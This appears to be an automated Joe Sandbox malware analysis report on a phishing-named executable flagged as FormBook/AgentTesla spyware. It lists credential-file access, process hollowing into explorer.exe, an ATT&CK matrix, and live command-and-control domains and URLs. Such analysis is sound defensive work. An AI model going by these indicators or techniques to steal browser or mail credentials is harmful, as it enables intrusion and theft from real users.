          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
          Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          MITRE ATT&CK Matrix

          • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          • Execution: 1 Shared Modules; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          • Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          • Privilege Escalation: 512 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          • Defense Evasion: 1 Rootkit; 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 512 Process Injection; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 13 Software Packing
          • Credential Access: 1 OS Credential Dumping; 1 Credential API Hooking; 1 Input Capture; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          • Discovery: 221 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Network Sniffing; Network Service Scanning
          • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          • Collection: 1 Email Collection; 1 Credential API Hooking; 1 Input Capture; 11 Archive Collected Data; 1 Data from Local System; GUI Input Capture; Web Portal Capture; Credential API Hooking
          • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          • Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          • Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
          Behavior Graph (ID: 626541, Sample: PO#12108997.exe, Startdate: 14/05/2022, Architecture: WINDOWS, Score: 100)

          Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures

          Process tree:
          • PO#12108997.exe (started); dropped file: C:\Users\user\AppData\...\PO#12108997.exe.log, ASCII
            • vbc.exe (started); signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
              • explorer.exe (injected); DNS/IP: www.madurababe.net 188.114.97.10, ports 49839, 49840, 49841, CLOUDFLARENETUS, European Union; www.tyz.world; tyz.world 34.102.136.180, ports 49810, 49811, 49812, GOOGLEUS, United States; signature: System process connects to network (likely due to code injection or exploit)
                • cmmon32.exe (started); dropped files: C:\Users\user\AppData\...\3NMlogrv.ini, data; C:\Users\user\AppData\...\3NMlogri.ini, data; signatures: Detected FormBook malware; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
                  • cmd.exe (started); signature: Tries to harvest and steal browser information (history, passwords, etc)
                    • conhost.exe (started)

          Source | Detection | Scanner | Label | Link
          PO#12108997.exe | 35% | Virustotal | | Browse
          PO#12108997.exe | 62% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
          PO#12108997.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          Source | Detection | Scanner | Label | Link | Download
          4.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          4.0.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          4.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          4.0.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          tyz.world | 34.102.136.180 | true | false | | unknown
          www.madurababe.net | 188.114.97.10 | true | true | | unknown
          www.tyz.world | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          www.mybenefitassist.com/p12s/ | true | Avira URL Cloud: safe | low
          http://www.tyz.world/p12s/ | false | Avira URL Cloud: safe | unknown
          http://www.madurababe.net/p12s/ | true | Avira URL Cloud: safe | unknown
          http://www.tyz.world/p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA | false | Avira URL Cloud: safe | unknown
          http://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd | true | Avira URL Cloud: safe | unknown
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comtPO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 
00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242576157.00000000062DB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comictaPO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/LPO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cnr-caPO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/GPO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/jp/PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comaPO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comdPO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/?PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://en.wPO#12108997.exe, 00000000.00000003.241230450.00000000062C6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.carterandcone.comlPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.jiyu-kobo.co.jp/zPO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cnPO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gDcmmon32.exe, 00000011.00000002.504685915.000000000558F000.00000004.10000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designers8PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.comalsPO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.comalicPO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/cPO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com~PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.10 | www.madurababe.net | European Union | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | tyz.world | United States | 15169 | GOOGLEUS | false
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 626541
Start date and time: 2022-05-14 11:53:09 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 58s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PO#12108997.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/6@2/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 32% (good quality ratio 29.2%)
• Quality average: 73.3%
• Quality standard deviation: 31%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
Time | Type | Description
11:54:17 | API Interceptor | 1x Sleep call for process: PO#12108997.exe modified
                                    No context
Process: C:\Users\user\Desktop\PO#12108997.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1308
Entropy (8bit): 5.345811588615766
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5: 2E016B886BDB8389D2DD0867BE55F87B
SHA1: 25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256: 1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512: C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious: true
Reputation: high, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
Process: C:\Windows\SysWOW64\cmd.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
